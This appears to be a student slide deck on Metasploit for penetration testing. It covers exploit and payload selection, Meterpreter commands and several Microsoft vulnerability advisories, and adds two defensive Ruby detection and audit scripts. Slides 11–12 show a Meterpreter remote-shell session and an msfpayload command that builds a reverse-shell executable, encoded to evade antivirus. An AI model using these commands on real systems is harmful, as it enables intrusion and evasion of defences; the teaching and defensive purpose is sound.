This vulnerability allows remote code execution if a target receives a specially crafted RPC request. An attacker could exploit it without authentication to run arbitrary code on Windows 2000, XP, and 2003 systems. Best practices like firewalls can help protect networks from outside attacks. The vulnerability is caused by unchecked buffers in the LSASS service.
Metasploit Framework
1. Lê Đức Quyền 08130075
Cao Ngô Nhật thanh 08130081
2. • “The Metasploit Framework is an advanced open-source
for attacking, testing, and using exploit code.”
• Metasploit software helps security and IT professionals identify security issues and verify vulnerabilities in systems.
• Perform penetration tests
• Overt penetration testing
• Covert penetration testing
• Consists of tools, libraries, modules, and user interfaces.
These are configured and combined to launch an exploit.
• Written in Ruby.
3. • Professional approach to penetration testing:
– Automation
– Reconnaissance, exploitation.
• All in one Solution
– Multi-platform
– Diverse range of target applications
• Open Source
– Custom payloads
5. • Choose exploit module:
• show exploits: list available exploits within the framework
• use exploit_name: choose exploit
• info exploit_name: view information about exploit
• Choose payload:
• show payloads: show only the payloads that are compatible with the chosen module
• info payload_name: view detailed information about payload
• set payload payload_name: choose payload
6. • Configure chosen payload:
• show options: view the options which you must configure
• set option_name value: configure option
• show advanced: show advanced options
• check: verify whether the options are configured correctly
• show targets: list potentially vulnerable targets
• set TARGET value: choose target
• exploit: initiates our exploit and attempts to attack the target
7. Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex commands for exploiting and attacking remote machines. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred.
8. • Fs: Provides interaction with the filesystem on the remote machine.
• Net: Provides interaction with the network stack on the remote machine.
• Process: Provides interaction with processes on the remote machine.
• Sys: Provides interaction with the environment on the remote machine.
9. • screenshot: capture the desktop screen of the victim
• sysinfo: view information about the platform of the victim
• meterpreter > sysinfo
Computer: IHAZSECURITY
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
10. • execute: executes a process on the remote endpoint
• kill: terminate one or more processes on the remote endpoint
• ps: list processes on the remote endpoint
11. meterpreter > execute -f cmd -c
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
meterpreter > interact 1
interact: Switching to interactive console on 1...
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>ipconfig
12. • Encoding payload with msfencode
root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe
• Multi-encoding: allows the payload to be encoded several times to throw off antivirus programs
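Added example, not from the slides: the defender's view of the multi-encoding step above. Each encoding pass rewrites the payload bytes, so an exact-byte signature of the original shellcode stops matching; what a scanner can still look for is the decoder stub that is prepended on every pass and the high entropy of the encoded body. The sample blobs are constructed here, and the fnstenv GetPC bytes are an indicator associated with the shikata_ga_nai stub, not a complete signature.

```ruby
# Two static indicators a defender can run against a file like the
# payload2.exe the slides produce. Multi-encoding changes the payload bytes
# on every pass, so exact-byte signatures of the original shellcode fail;
# what survives is the decoder stub each pass prepends and the high entropy
# of the encoded body.

# fnstenv [esp-0xc] (D9 74 24 F4) is the FPU-based GetPC sequence that the
# shikata_ga_nai decoder stub uses. Treat it as an indicator, not a complete
# signature: other FPU GetPC stubs emit the same bytes.
GETPC_FNSTENV = "\xD9\x74\x24\xF4".b.freeze

# Shannon entropy in bits per byte: 0.0 for a constant run, close to 8.0 for
# uniformly random data. Encoded or packed payload bodies sit near the top.
def shannon_entropy(bytes)
  return 0.0 if bytes.empty?
  counts = Hash.new(0)
  bytes.each_byte { |b| counts[b] += 1 }
  n = bytes.bytesize.to_f
  total = counts.values.sum { |c| (c / n) * Math.log2(c / n) }
  -total
end

# Byte offsets of every GetPC stub occurrence in the blob.
def getpc_offsets(bytes)
  offsets = []
  pos = 0
  while (i = bytes.index(GETPC_FNSTENV, pos))
    offsets << i
    pos = i + 1
  end
  offsets
end

# Both conditions together are a stronger signal than either alone.
def suspicious?(bytes, entropy_threshold: 7.0)
  !getpc_offsets(bytes).empty? && shannon_entropy(bytes) > entropy_threshold
end

# Constructed samples: a stand-in "encoded body" of seeded pseudo-random bytes
# behind the stub, and a plain-text region of similar size for contrast.
ENCODED_SAMPLE = (GETPC_FNSTENV + Random.new(1337).bytes(4096)).b.freeze
PLAIN_SAMPLE   = ("The Metasploit Framework is written in Ruby. " * 90).b.freeze

if __FILE__ == $PROGRAM_NAME
  [['encoded', ENCODED_SAMPLE], ['plain', PLAIN_SAMPLE]].each do |name, blob|
    printf("%-8s entropy=%.2f getpc_at=%s suspicious=%s\n", name,
           shannon_entropy(blob), getpc_offsets(blob).inspect, suspicious?(blob))
  end
end
```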
14. • Vulnerability in Server Service Could Allow Remote Code Execution (958644)
• The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code.
• Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.
http://technet.microsoft.com/en-us/security/bulletin/ms08-067
15. LSASS Vulnerability - CAN-2003-0533
Impact of vulnerability: Remote Code Execution
An attacker who successfully exploited the most severe of
these vulnerabilities could take complete control of an
affected system, including installing programs; viewing,
changing, or deleting data; or creating new accounts that
have full privileges.
This vulnerability is caused by an unchecked buffer in the
LSASS service.
16. • This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts.
• Systems are only vulnerable to remote attack when sharing a printer and the remote attacker can access the printer share.
• This vulnerability is caused when the Windows Print Spooler insufficiently restricts user permissions to access print spoolers.
• Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.
• http://technet.microsoft.com/en-us/security/bulletin/MS10-061
17. • This vulnerability is caused because the Windows RPCSS service does not properly check message inputs under certain circumstances. After establishing a connection, an attacker could send a specially crafted malformed RPC message to cause the underlying Distributed Component Object Model (DCOM) process on the remote system to fail in such a way that arbitrary code could be executed.
• To exploit this vulnerability, the attacker would require the ability to send a specially crafted request to port 135, 139, 445 or 593 or any other specifically configured RPC port on the remote machine.
• Best practices recommend blocking all TCP/IP ports that are not actually being used.
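Added example, not from the slides: slides 14 to 17 all end with the same control, blocking the RPC/SMB ports at the perimeter. This script checks whether that control actually holds by auditing a connection log for accepted inbound connections from outside the enterprise to those ports. The log format, the sample lines and the RFC 1918 definition of "internal" are assumptions made for this example.

```ruby
require 'ipaddr'

# Ports the slides name for the RPC/SMB attack surface (MS03-026, MS04-011,
# MS08-067). The recommended control is blocking them at the perimeter; this
# script audits a connection log for inbound accepts on them from outside.
RPC_SMB_PORTS = [135, 139, 445, 593].freeze

# Assumed internal address space (RFC 1918); adjust to your own perimeter.
INTERNAL_NETS = %w[10.0.0.0/8 172.16.0.0/12 192.168.0.0/16].map { |n| IPAddr.new(n) }

def internal?(ip)
  addr = IPAddr.new(ip)
  INTERNAL_NETS.any? { |net| net.include?(addr) }
end

# Constructed log format (not any real firewall's):
#   <timestamp> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <action>
LINE_RE = /\A(\S+) (tcp|udp) (\S+):(\d+) -> (\S+):(\d+) (ACCEPT|DROP)\z/

# Returns accepted TCP connections from external sources to internal hosts on
# an RPC/SMB port; each hit is a hash the caller can alert on.
def perimeter_violations(log_lines)
  log_lines.each_with_object([]) do |line, hits|
    m = LINE_RE.match(line.strip)
    next unless m                       # skip lines that do not parse
    ts, proto, src, _sport, dst, dport, action = m.captures
    dport = dport.to_i
    next unless proto == 'tcp' && action == 'ACCEPT'
    next unless RPC_SMB_PORTS.include?(dport)
    next if internal?(src)              # east-west traffic is a separate review
    next unless internal?(dst)          # only our own hosts matter here
    hits << { time: ts, src: src, dst: dst, dport: dport }
  end
end

# Constructed sample lines for a stand-alone run.
SAMPLE_LOG = [
  '2014-05-01T10:00:01Z tcp 203.0.113.7:49152 -> 192.168.1.20:445 ACCEPT',
  '2014-05-01T10:00:02Z tcp 192.168.1.5:51000 -> 192.168.1.20:445 ACCEPT',
  '2014-05-01T10:00:03Z tcp 198.51.100.9:40000 -> 192.168.1.20:135 DROP',
  '2014-05-01T10:00:04Z tcp 198.51.100.9:40001 -> 192.168.1.21:593 ACCEPT',
  '2014-05-01T10:00:05Z tcp 203.0.113.7:49153 -> 192.168.1.20:80 ACCEPT',
  'garbage line that does not parse',
].freeze

if __FILE__ == $PROGRAM_NAME
  perimeter_violations(SAMPLE_LOG).each do |h|
    puts "#{h[:time]} #{h[:src]} -> #{h[:dst]}:#{h[:dport]} reached an RPC/SMB port from outside"
  end
end
```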
18. • A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.
• http://technet.microsoft.com/en-us/security/bulletin/MS08-041
Editor's notes
interact 1: Start a session with the channel just established with the remote machine.